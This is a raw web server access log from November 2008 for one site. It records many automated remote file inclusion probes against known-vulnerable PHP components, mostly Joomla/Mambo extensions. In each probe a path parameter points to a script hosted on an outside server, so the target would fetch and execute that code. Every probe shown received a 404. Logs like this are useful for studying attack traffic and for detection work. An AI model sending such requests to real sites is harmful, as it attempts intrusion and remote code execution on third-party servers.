140.130.101.5 - - [10/Nov/2008:08:09:46 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:09:46 -0800] "GET /logs/access_080715.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:09:49 -0800] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:09:55 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:09:55 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:09:55 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [10/Nov/2008:08:09:59 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rupkalwis.com/includes/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:10:24 -0800] "GET /logs/access_080928.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:10:24 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:10:24 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:08:10:32 -0800] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ggdo.com/zboard/jem/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:10:36 -0800] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:10:50 -0800] "GET /logs/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:10:50 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:10:50 -0800] "GET /logs/access_080116.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:10:54 -0800] "GET /logs/access_080401.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:14 -0800] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:14 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:14 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:15 -0800] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:11:35 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:11:40 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:48 -0800] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:48 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:48 -0800] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:11:48 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:12:02 -0800] "GET /logs/access_081027.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:12:03 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:12:06 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:12:27 -0800] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
64.27.11.149 - - [10/Nov/2008:08:12:32 -0800] "GET /logs/access_080920.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.27.11.149 - - [10/Nov/2008:08:12:33 -0800] "GET /logs/access_080417.log HTTP/1.1" 200 1622977 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.27.11.149 - - [10/Nov/2008:08:12:34 -0800] "GET /logs/access_080610.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.27.11.149 - - [10/Nov/2008:08:12:34 -0800] "GET /logs/access_080719.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:12:51 -0800] "GET /logs/access_080901.log/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:13:07 -0800] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:13:07 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:13:07 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:13:37 -0800] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ideaindustry.us/content/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:13:37 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ideaindustry.us/content/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:13:37 -0800] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ideaindustry.us/content/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:13:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ideaindustry.us/content/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:13:58 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:14:00 -0800] "GET /logs/access_081010.log%20/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:14:03 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:14:09 -0800] "GET /logs/access_080905.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:14:09 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:14:09 -0800] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:14:09 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:08:14:09 -0800] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:09 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:09 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:09 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:09 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:10 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:10 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:14 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:14 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:15 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:19 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:19 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:14:21 -0800] "GET /logs/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:14:21 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:14:21 -0800] "GET /logs/access_080116.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:22 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:22 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:22 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:22 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:14:26 -0800] "GET /logs/access_080401.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:14:27 -0800] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:14:29 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:14:35 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scanrfi/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:37 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:37 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:37 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:38 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:38 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:38 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:14:39 -0800] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ideaindustry.us/content/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:14:45 -0800] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:14:47 -0800] "GET /logs/access_081010.log%20/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:14:48 -0800] "GET /logs/access_080511.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:14:51 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:14:51 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:08:14:52 -0800] "GET /logs/scripts.log%20%20//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:08:15:02 -0800] "GET /logs/access_071212.log//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:08:15:02 -0800] "GET /lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:08:15:03 -0800] "GET /logs//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:08:15:11 -0800] "GET /logs/access_071213.log//lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:15:22 -0800] "GET /logs/access_080303.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:22 -0800] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:22 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:15:23 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:15:27 -0800] "GET /logs/access_080724.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:15:29 -0800] "GET /logs/access_080602.log%20/home.php?p=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:15:31 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:15:38 -0800] "GET /logs/scripts.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:15:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.151.93.132 - - [10/Nov/2008:08:15:40 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/errors.php?_SESSION[docroot_path]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
